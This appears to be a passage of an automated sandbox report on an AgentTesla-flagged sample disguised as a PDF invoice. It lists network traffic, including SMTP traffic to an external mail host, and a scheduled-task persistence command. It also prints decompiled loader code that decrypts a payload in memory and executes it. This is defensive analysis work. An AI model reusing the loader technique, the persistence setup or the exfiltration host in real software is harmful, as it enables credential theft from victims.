Nov 27, 2020 18:49:16.822701931 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.822729111 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.822778940 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.822802067 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.822850943 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.822865963 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.822911024 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.822930098 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.822985888 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.823029995 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.823081017 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.823107004 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.823151112 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.823170900 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.853338003 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.853439093 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.853486061 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.853533983 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.853554964 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.853593111 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.853641033 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.869080067 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869136095 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869203091 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.869235039 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869323969 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869373083 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.869437933 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869491100 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869558096 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.869591951 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869651079 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869699001 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:16.869723082 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869796038 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:49:16.869844913 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:49:35.606722116 CET	49725	587	192.168.2.3	66.70.204.222
Nov 27, 2020 18:49:35.712296009 CET	587	49725	66.70.204.222	192.168.2.3
Nov 27, 2020 18:49:35.712419987 CET	49725	587	192.168.2.3	66.70.204.222
Nov 27, 2020 18:49:35.944700003 CET	587	49725	66.70.204.222	192.168.2.3
Nov 27, 2020 18:49:35.945132971 CET	49725	587	192.168.2.3	66.70.204.222
Nov 27, 2020 18:49:36.050761938 CET	587	49725	66.70.204.222	192.168.2.3
Nov 27, 2020 18:49:36.051378012 CET	49725	587	192.168.2.3	66.70.204.222
Nov 27, 2020 18:49:36.110667944 CET	49725	587	192.168.2.3	66.70.204.222
Nov 27, 2020 18:49:36.158169031 CET	587	49725	66.70.204.222	192.168.2.3
Nov 27, 2020 18:49:36.159563065 CET	49725	587	192.168.2.3	66.70.204.222
Nov 27, 2020 18:49:36.216675043 CET	587	49725	66.70.204.222	192.168.2.3
Nov 27, 2020 18:49:36.216753006 CET	49725	587	192.168.2.3	66.70.204.222
Nov 27, 2020 18:49:36.615303993 CET	80	49689	104.108.38.112	192.168.2.3
Nov 27, 2020 18:49:36.617043018 CET	49689	80	192.168.2.3	104.108.38.112
Nov 27, 2020 18:49:36.617099047 CET	49689	80	192.168.2.3	104.108.38.112
Nov 27, 2020 18:49:36.633902073 CET	80	49689	104.108.38.112	192.168.2.3
Nov 27, 2020 18:49:38.803575993 CET	80	49680	205.185.216.10	192.168.2.3
Nov 27, 2020 18:49:38.803857088 CET	49680	80	192.168.2.3	205.185.216.10
Nov 27, 2020 18:49:40.108978033 CET	80	49683	93.184.220.29	192.168.2.3
Nov 27, 2020 18:49:40.109314919 CET	49683	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:49:40.319173098 CET	80	49684	93.184.220.29	192.168.2.3
Nov 27, 2020 18:49:40.319333076 CET	49684	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:49:40.563829899 CET	49688	443	192.168.2.3	104.108.60.202
Nov 27, 2020 18:49:40.584395885 CET	443	49688	104.108.60.202	192.168.2.3
Nov 27, 2020 18:49:40.584429026 CET	443	49688	104.108.60.202	192.168.2.3
Nov 27, 2020 18:49:40.584531069 CET	49688	443	192.168.2.3	104.108.60.202
Nov 27, 2020 18:49:40.584580898 CET	49688	443	192.168.2.3	104.108.60.202
Nov 27, 2020 18:49:40.735589981 CET	80	49687	93.184.220.29	192.168.2.3
Nov 27, 2020 18:49:40.735716105 CET	49687	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:49:41.575989962 CET	80	49682	93.184.220.29	192.168.2.3
Nov 27, 2020 18:49:41.576338053 CET	49682	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:49:41.897706985 CET	49693	443	192.168.2.3	104.80.21.45
Nov 27, 2020 18:49:41.898313999 CET	49694	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:49:43.322161913 CET	49697	443	192.168.2.3	204.79.197.200
Nov 27, 2020 18:49:43.322335005 CET	49696	443	192.168.2.3	204.79.197.200
Nov 27, 2020 18:50:29.458873987 CET	49682	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:50:29.459007025 CET	49678	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:50:29.459096909 CET	49683	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:50:29.459163904 CET	49680	80	192.168.2.3	205.185.216.10
Nov 27, 2020 18:50:29.459284067 CET	49681	80	192.168.2.3	67.27.233.126
Nov 27, 2020 18:50:29.475214005 CET	80	49682	93.184.220.29	192.168.2.3
Nov 27, 2020 18:50:29.475243092 CET	80	49683	93.184.220.29	192.168.2.3
Nov 27, 2020 18:50:29.475353956 CET	49682	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:50:29.475466013 CET	49683	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:50:29.480077982 CET	80	49681	67.27.233.126	192.168.2.3
Nov 27, 2020 18:50:29.480241060 CET	49681	80	192.168.2.3	67.27.233.126
Nov 27, 2020 18:50:29.481194973 CET	80	49680	205.185.216.10	192.168.2.3
Nov 27, 2020 18:50:29.481340885 CET	49680	80	192.168.2.3	205.185.216.10
Nov 27, 2020 18:50:29.520664930 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:50:29.629192114 CET	443	49678	13.83.66.189	192.168.2.3
Nov 27, 2020 18:50:29.629288912 CET	49678	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:50:29.693150043 CET	443	49679	13.83.66.189	192.168.2.3
Nov 27, 2020 18:50:29.693242073 CET	49679	443	192.168.2.3	13.83.66.189
Nov 27, 2020 18:50:30.067544937 CET	49684	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:50:30.067629099 CET	49685	80	192.168.2.3	67.27.233.126
Nov 27, 2020 18:50:30.083908081 CET	80	49684	93.184.220.29	192.168.2.3
Nov 27, 2020 18:50:30.085798979 CET	49684	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:50:30.087729931 CET	80	49685	67.27.233.126	192.168.2.3
Nov 27, 2020 18:50:30.087833881 CET	49685	80	192.168.2.3	67.27.233.126
Nov 27, 2020 18:50:42.171714067 CET	80	49687	93.184.220.29	192.168.2.3
Nov 27, 2020 18:50:42.171875954 CET	49687	80	192.168.2.3	93.184.220.29
Nov 27, 2020 18:50:51.760807037 CET	443	49686	204.79.197.200	192.168.2.3
Nov 27, 2020 18:50:55.276993036 CET	80	49687	93.184.220.29	192.168.2.3
Nov 27, 2020 18:50:55.277185917 CET	49687	80	192.168.2.3	93.184.220.29

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 18:48:50.724462986 CET	60831	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:48:50.751859903 CET	53	60831	8.8.8.8	192.168.2.3
Nov 27, 2020 18:48:51.523782969 CET	60100	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:48:51.550929070 CET	53	60100	8.8.8.8	192.168.2.3
Nov 27, 2020 18:48:52.340898037 CET	53195	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:48:52.368297100 CET	53	53195	8.8.8.8	192.168.2.3
Nov 27, 2020 18:48:53.460632086 CET	50141	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:48:53.487828970 CET	53	50141	8.8.8.8	192.168.2.3
Nov 27, 2020 18:48:54.683697939 CET	53023	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:48:54.710848093 CET	53	53023	8.8.8.8	192.168.2.3
Nov 27, 2020 18:48:55.710408926 CET	49563	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:48:55.737627983 CET	53	49563	8.8.8.8	192.168.2.3
Nov 27, 2020 18:48:56.610769987 CET	51352	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:48:56.637826920 CET	53	51352	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:17.352818966 CET	59349	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:17.380176067 CET	53	59349	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:25.267473936 CET	57084	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:25.304222107 CET	53	57084	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:28.796281099 CET	58823	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:28.823597908 CET	53	58823	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:29.572182894 CET	57568	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:29.599486113 CET	53	57568	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:30.357292891 CET	50540	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:30.384581089 CET	53	50540	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:31.431689978 CET	54366	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:31.458792925 CET	53	54366	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:31.604557991 CET	53034	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:31.648224115 CET	53	53034	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:35.526433945 CET	57762	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:35.572897911 CET	53	57762	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:40.148825884 CET	55435	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:40.186539888 CET	53	55435	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:51.248121023 CET	50713	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:51.275444031 CET	53	50713	8.8.8.8	192.168.2.3
Nov 27, 2020 18:49:54.172245026 CET	56132	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:49:54.209326982 CET	53	56132	8.8.8.8	192.168.2.3
Nov 27, 2020 18:50:04.793050051 CET	58987	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:50:04.820249081 CET	53	58987	8.8.8.8	192.168.2.3
Nov 27, 2020 18:50:25.860347986 CET	56579	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:50:25.887492895 CET	53	56579	8.8.8.8	192.168.2.3
Nov 27, 2020 18:50:27.451786041 CET	60633	53	192.168.2.3	8.8.8.8
Nov 27, 2020 18:50:27.487265110 CET	53	60633	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 27, 2020 18:49:35.526433945 CET	192.168.2.3	8.8.8.8	0x1fe7	Standard query (0)	mail.hybridgroupco.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 27, 2020 18:49:35.572897911 CET	8.8.8.8	192.168.2.3	0x1fe7	No error (0)	mail.hybridgroupco.com	hybridgroupco.com		CNAME (Canonical name)	IN (0x0001)
Nov 27, 2020 18:49:35.572897911 CET	8.8.8.8	192.168.2.3	0x1fe7	No error (0)	hybridgroupco.com		66.70.204.222	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 27, 2020 18:49:35.944700003 CET	587	49725	66.70.204.222	192.168.2.3	220-host.theserver.live ESMTP Exim 4.93 #2 Fri, 27 Nov 2020 21:49:35 +0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 27, 2020 18:49:35.945132971 CET	49725	587	192.168.2.3	66.70.204.222	EHLO 142233
Nov 27, 2020 18:49:36.050761938 CET	587	49725	66.70.204.222	192.168.2.3	250-host.theserver.live Hello 142233 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Nov 27, 2020 18:49:36.051378012 CET	49725	587	192.168.2.3	66.70.204.222	STARTTLS
Nov 27, 2020 18:49:36.158169031 CET	587	49725	66.70.204.222	192.168.2.3	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Proforma Invoice with Bank Details_pdf.exe PID: 6672 Parent PID: 5608

General

Start time:	18:48:55
Start date:	27/11/2020
Path:	C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Proforma Invoice with Bank Details_pdf.exe'
Imagebase:	0xc40000
File size:	626176 bytes
MD5 hash:	8816AE2D440C50E7EC52BE21AE6E2B22
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6680 Parent PID: 6672

General

Start time:	18:48:56
Start date:	27/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6736 Parent PID: 6672

General

Start time:	18:48:56
Start date:	27/11/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 6744 Parent PID: 6672

General

Start time:	18:48:56
Start date:	27/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Imagebase:	0x520000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.473024653.0000000002C01000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.473614554.0000000002CCE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.469545862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.474100533.0000000002DA4000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 6756 Parent PID: 6736

General

Start time:	18:48:57
Start date:	27/11/2020
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /Create /TN name /XML 'C:\Users\user\AppData\Local\Temp\eb880290d3c747809c5fd1c3af592ae7.xml'
Imagebase:	0xae0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Proforma Invoice with Bank Details_pdf.exe PID: 6672 Parent PID: 5608 Proforma Invoice with Bank Details_pdf.exeCOMMON

Executed Functions

Function 00C62DC3, Relevance: 24.4, APIs: 6, Strings: 7, Instructions: 1637COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,00000100), ref: 00C6512B

Strings

</UserId></LogonTrigger><RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger></Triggers><Principals><Principal id="Author"><UserId>, xrefs: 00C651BC, 00C651C2
\, xrefs: 00C6305E
D, xrefs: 00C652E6
</UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>, xrefs: 00C651E2, 00C651E8
</Author></RegistrationInfo><Triggers><LogonTrigger><Enabled>true</Enabled><UserId>, xrefs: 00C65196, 00C6519C
</Command></Exec></Actions></Task>, xrefs: 00C65204, 00C65207
<?xml version="1.0" encoding="UTF-16"?><Task version = "1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo><Date>2015-09-27T14:27:44.8929027</Date > <Author>, xrefs: 00C65170, 00C65176

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID: </Author></RegistrationInfo><Triggers><LogonTrigger><Enabled>true</Enabled><UserId>$</Command></Exec></Actions></Task>$</UserId></LogonTrigger><RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger></Triggers><Principals><Principal id="Author"><UserId>$</UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals><Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority></Settings><Actions Context="Author"><Exec><Command>$<?xml version="1.0" encoding="UTF-16"?><Task version = "1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"><RegistrationInfo><Date>2015-09-27T14:27:44.8929027</Date > <Author>$D$\
API String ID: 2645101109-3025515227
Opcode ID: 2ca809b1f050dc74db4839c37d9f576b21e9ea26cd7391c24978057f2aec208d
Instruction ID: bb397d4acb509c368f8e14005cf5f4067c7ef7a7bff69446fdd3208e941e75dc
Opcode Fuzzy Hash: 2ca809b1f050dc74db4839c37d9f576b21e9ea26cd7391c24978057f2aec208d
Instruction Fuzzy Hash: 5E335850D0C7E8C9EB22C6689C587DDAEB51B12749F0841D9C18C6A293C7FB1BD8DB36

Uniqueness

Uniqueness Score: -1.00%

Function 00C41970, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00C41970(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				long _v16;
				char _v18;
				short _v20;
				intOrPtr _v24;
				char _v28;
				char _v30;
				short _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr* _t40;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t48;
				void* _t49;
				signed char _t51;
				void* _t55;
				intOrPtr* _t56;
				void* _t84;
				void* _t87;

				_v28 = 0x72657355;
				_v24 = 0x642e3233;
				_v20 = 0x6c6c;
				_v18 = 0;
				_v40 = 0x72637052;
				_v36 = 0x642e3474;
				_v32 = 0x6c6c;
				_v30 = 0;
				_t56 = E00C418D0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
				_t12 =  &_v28; // 0x72657355
				_v8 = E00C418D0( *_t56(_t12, _t84, _t87, _t55), 0xb4c47f55);
				_t40 = E00C418D0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
				_t17 =  &_v28; // 0x72657355
				_t43 = E00C418D0( *_t56(_t17), 0xc7e6f44f);
				_t44 =  *_t40(0); // executed
				 *_t43(_t44);
				_t18 =  &_v40; // 0x72637052
				_t48 = E00C418D0( *_t56(_t18), 0x958d1c17);
				_t49 =  *_t48(0, 2, 0, 1, 0,  &_v12); // executed
				if(_t49 != 0 && _t49 == 0x57) {
					_t51 = 0;
					do {
						_t20 =  &E00C60928 + _t51; // 0x198ee9
						 *( &E00C60928 + _t51) =  !( !(0x000000b0 - ( !( !( !( *_t20) + 0x79) + 0x56) ^ _t51) - _t51 ^ 0x00000068) + _t51) ^ 0x000000e7;
						_t51 = _t51 + 1;
					} while (_t51 < 0x4e05);
					VirtualProtect( &E00C60928, 0x4e05, 0x40,  &_v16); // executed
					CallWindowProcW( &E00C60928, 0xc65730, 0, 0, 0);
				}
				return 0;
			}

0x00c41979
0x00c41980
0x00c41987
0x00c4198d
0x00c41991
0x00c41998
0x00c4199f
0x00c419a5
0x00c419c8
0x00c419ca
0x00c419dc
0x00c419f9
0x00c41a00
0x00c41a0d
0x00c41a16
0x00c41a19
0x00c41a1b
0x00c41a28
0x00c41a3b
0x00c41a42
0x00c41a49
0x00c41a50
0x00c41a50
0x00c41a76
0x00c41a7c
0x00c41a7d
0x00c41a94
0x00c41aaa
0x00c41aaa
0x00c41ab2

APIs

GetConsoleWindow.KERNELBASE(00000000,?,00000000), ref: 00C41A16
RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,00C447C2,?,00000000), ref: 00C41A3B
VirtualProtect.KERNELBASE(00C60928,00004E05,00000040,?), ref: 00C41A94
CallWindowProcW.USER32(00C60928,00C65730,00000000,00000000,00000000), ref: 00C41AAA

Strings

Rpcrt4.dllUser32.dll, xrefs: 00C41A1B, 00C41A1E
User32.dll, xrefs: 00C419CA, 00C419CD

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
String ID: Rpcrt4.dllUser32.dll$User32.dll
API String ID: 546183053-2494872352
Opcode ID: ac013b11138169f4b03cdf901b5a0acdd07dc6cc1e32c4e74f7588930eb2d157
Instruction ID: 355f0ee1351115790f6f0a886be308e61c64766c791c71e4b32d01b26b5400c9
Opcode Fuzzy Hash: ac013b11138169f4b03cdf901b5a0acdd07dc6cc1e32c4e74f7588930eb2d157
Instruction Fuzzy Hash: 3C31E375B51308AFEB00DBB5C886F9FB7E5EF48720F140050EA45EB292D6B5DA448B54

Uniqueness

Uniqueness Score: -1.00%

Function 00C44681, Relevance: 18.1, APIs: 12, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C44681(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v20;
				signed int _v32;
				intOrPtr _v40;
				void* _t19;
				signed int _t20;
				intOrPtr _t28;
				signed int _t29;
				signed int _t30;
				intOrPtr _t34;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t48;
				signed int _t49;
				void* _t61;
				void* _t62;
				void* _t63;

				_t63 = __esi;
				_t62 = __edi;
				_t61 = __edx;
				_t48 = __ebx;
				while(1) {
					_t19 = E00C45B0A(_t48, _t61, _t62, _a4);
					if(_t19 != 0) {
						break;
					}
					_t20 = E00C4B5B2(_t19, _a4);
					__eflags = _t20;
					if(_t20 == 0) {
						_push(1);
						_v8 = "bad allocation";
						E00C43CF0( &_v20,  &_v8);
						_v20 = 0xc591d0;
						E00C4560A( &_v20, 0xc5d03c);
						asm("int3");
						_push(0x14);
						_push(0xc5d128);
						E00C4AF50(_t48, _t62, _t63);
						E00C4BDA5(1);
						__eflags =  *0xc40000 - 0x5a4d; // 0x5a4d
						if(__eflags == 0) {
							_t28 =  *0xc4003c; // 0xf8
							__eflags =  *((intOrPtr*)(_t28 + 0xc40000)) - 0x4550;
							if( *((intOrPtr*)(_t28 + 0xc40000)) != 0x4550) {
								goto L6;
							} else {
								__eflags =  *((intOrPtr*)(_t28 + 0xc40018)) - 0x10b;
								if( *((intOrPtr*)(_t28 + 0xc40018)) != 0x10b) {
									goto L6;
								} else {
									_t49 = 0;
									__eflags =  *((intOrPtr*)(_t28 + 0xc40074)) - 0xe;
									if( *((intOrPtr*)(_t28 + 0xc40074)) > 0xe) {
										__eflags =  *(_t28 + 0xc400e8);
										_t13 =  *(_t28 + 0xc400e8) != 0;
										__eflags = _t13;
										_t49 = 0 | _t13;
									}
								}
							}
						} else {
							L6:
							_t49 = 0;
						}
						_v32 = _t49;
						_t29 = E00C4A5C8();
						__eflags = _t29;
						if(_t29 == 0) {
							E00C44818(0x1c);
						}
						_t30 = E00C4AB93(_t49, _t62);
						__eflags = _t30;
						if(_t30 == 0) {
							_t30 = E00C44818(0x10);
						}
						E00C4BE8C(_t30);
						_v8 = _v8 & 0x00000000;
						E00C4B7AB();
						 *0xcc8680 = GetCommandLineA(); // executed
						_t34 = E00C4BECC(); // executed
						 *0xcc5970 = _t34;
						__eflags = E00C4BA97();
						if(__eflags < 0) {
							E00C4AC6E(_t49, _t61, _t62, _t63, __eflags, 8);
						}
						__eflags = E00C4BCC4(_t49, _t61, _t62, _t63);
						if(__eflags < 0) {
							E00C4AC6E(_t49, _t61, _t62, _t63, __eflags, 9);
						}
						__eflags = E00C4ACA8(_t62, _t63, 1);
						if(__eflags != 0) {
							E00C4AC6E(_t49, _t61, _t62, _t63, __eflags, _t37);
						}
						_t38 =  *0xcc5af8; // 0xf80f50
						 *0xcc5b18 = _t38;
						_push(_t38);
						_push( *0xcc5af0);
						_push( *0xcc5aec); // executed
						_t39 = E00C41970(__eflags); // executed
						_t64 = _t39;
						_v40 = _t39;
						__eflags = _t49;
						if(_t49 == 0) {
							E00C4AF00(_t64);
						}
						E00C4AC99();
						_v8 = 0xfffffffe;
